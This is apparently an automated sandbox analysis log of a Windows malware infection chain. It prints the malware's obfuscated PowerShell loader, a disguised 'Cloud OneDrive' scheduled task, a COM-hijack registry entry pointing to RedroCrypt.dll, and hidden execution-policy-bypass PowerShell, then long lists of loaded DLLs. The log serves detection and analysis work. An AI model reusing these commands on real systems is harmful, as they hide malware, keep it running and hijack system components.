        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x65)+[char]([byte]0x72)+[char]([byte]0x61)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x62)+[char]([byte]0x79)+[char]([byte]0x6e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x28)+[c
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x65)+[char]([byte]0x72)+[char]([byte]0x61)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x62)+[char]([byte]0x79)+[char]([byte]0x6e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x28)+[cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbsJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.batJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /fJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /fJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
